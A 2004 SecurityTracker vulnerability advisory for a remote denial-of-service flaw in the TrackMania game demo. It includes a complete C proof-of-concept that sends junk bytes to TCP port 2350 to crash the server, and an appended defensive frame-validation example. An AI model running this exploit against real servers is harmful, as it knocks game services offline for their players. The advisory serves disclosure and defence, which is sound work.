SecurityTracker.com
Category:   Application (Game)  >   TrackMania
Vendors:   Nadeo
TrackMania Game Demo Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008983
SecurityTracker URL:  http://securitytracker.com/id/1008983
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 9 2004
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   Arnaud Jacques (scrap) from Securiteinfo.com reported a denial of service vulnerability in the TrackMania game in the demo version. A remote user can cause the game to crash.

It is reported that a remote user can send some 'garbage' data to TCP port 2350 on the target server to cause the multiplayer game server to crash.

A demonstration exploit script is provided in the Source Message and at:

http://www.securiteinfo.com/download/kill-trackmania.c

The vendor has reportedly been notified.

The original advisory is available at:

http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml

Impact:   A remote user can cause the game server to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.trackmania.com/
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  TrackMania Demo Denial of Service


TrackMania Demo Denial of Service
The original document can be found at
http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml


.oO  Overview Oo.
TrackMania Demo Denial of Service
Discovered on 2003, November, 30th
Vendor: TrackMania Official website http://www.trackmania.com

TrackMania is a "Stunt Car Racer" like game. The multiplayer demo of this game
is subject to denial of service.


.oO  Details Oo.
The multiplayer game uses TCP port 2350 to communicate. If you send some
garbage to this port, it will shut down the game server.


.oO  Exploit Oo.
Here is the proof of concept:

/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* webmaster@securiteinfo.com
* http://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;

    printf("\n [kill-trackmania.c] by Scrap / Securiteinfo.com\n");

    if (argc<2)
    {
        printf("Usage: %s target\n\n",argv[0]);
        exit(0);
    }

    /* Resolve the target host name or address */
    if ((he=gethostbyname(argv[1])) == NULL)
    {
        herror("gethostbyname");
        exit(0);
    }

    /* Build the destination address: resolved host, TCP port 2350 */
    sock=socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(2350);

    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
        perror("connect");
        exit(0);
    }
    printf("\n\t Sending Bomb... \n");
    /* The length argument is 17, so only the first 17 bytes of the literal are sent */
    send(sock, "Bomb from Securiteinfo.com\n\n",17,0);
    close(sock);

    printf("\t Bomb sent...\n");

    return 0;
}

Download kill-trackmania.c at
http://www.securiteinfo.com/download/kill-trackmania.c


.oO  Solution Oo.
The vendor has been informed and has not solved the problem.


.oO  Discovered by Oo.
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com
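
The listed cause is an exception handling error: unexpected bytes on TCP port 2350 take down the whole server process. The following is an added example, not code from the advisory or from the vendor, showing the defensive pattern in which a malformed frame disconnects only the offending client. The frame layout ('T' 'M' magic plus a 2-byte length) and all function names are hypothetical, since the real TrackMania protocol is not described on this page.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical framing, assumed for illustration (the real TrackMania
 * protocol is not described on this page):
 * magic 'T' 'M', 2-byte big-endian payload length, then the payload. */
#define HDR_LEN     4
#define MAX_PAYLOAD 512

enum verdict { PKT_OK, PKT_NEED_MORE, PKT_DROP_CLIENT };
struct stats { int accepted; int dropped; };

/* Validate the frame at the start of buf. Malformed input is reported to
 * the caller as PKT_DROP_CLIENT; nothing here can terminate the process. */
enum verdict check_frame(const unsigned char *buf, size_t len, size_t *frame_len)
{
    *frame_len = 0;
    if (len >= 1 && buf[0] != 'T') return PKT_DROP_CLIENT;
    if (len >= 2 && buf[1] != 'M') return PKT_DROP_CLIENT;
    if (len < HDR_LEN) return PKT_NEED_MORE;
    size_t payload = ((size_t)buf[2] << 8) | buf[3];
    if (payload > MAX_PAYLOAD) return PKT_DROP_CLIENT;
    if (len - HDR_LEN < payload) return PKT_NEED_MORE;
    *frame_len = HDR_LEN + payload;
    return PKT_OK;
}

/* Handle bytes received from one client. A bad frame disconnects that
 * client only (counted in dropped); other clients are unaffected. */
void on_client_data(struct stats *s, const unsigned char *buf, size_t len)
{
    size_t off = 0, flen;
    while (off < len) {
        enum verdict v = check_frame(buf + off, len - off, &flen);
        if (v == PKT_DROP_CLIENT) { s->dropped++; return; }
        if (v == PKT_NEED_MORE) return;      /* wait for the rest */
        s->accepted++;
        off += flen;
    }
}

int main(void)
{
    struct stats s = {0, 0};
    /* Constructed inputs: the 17 bytes the proof of concept sends, then a valid frame. */
    const unsigned char garbage[] = "Bomb from Securit";
    const unsigned char good[] = {'T', 'M', 0x00, 0x02, 'h', 'i'};
    on_client_data(&s, garbage, 17);
    on_client_data(&s, good, sizeof good);
    printf("accepted=%d dropped=%d\n", s.accepted, s.dropped);
    return 0;
}
```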


 
 

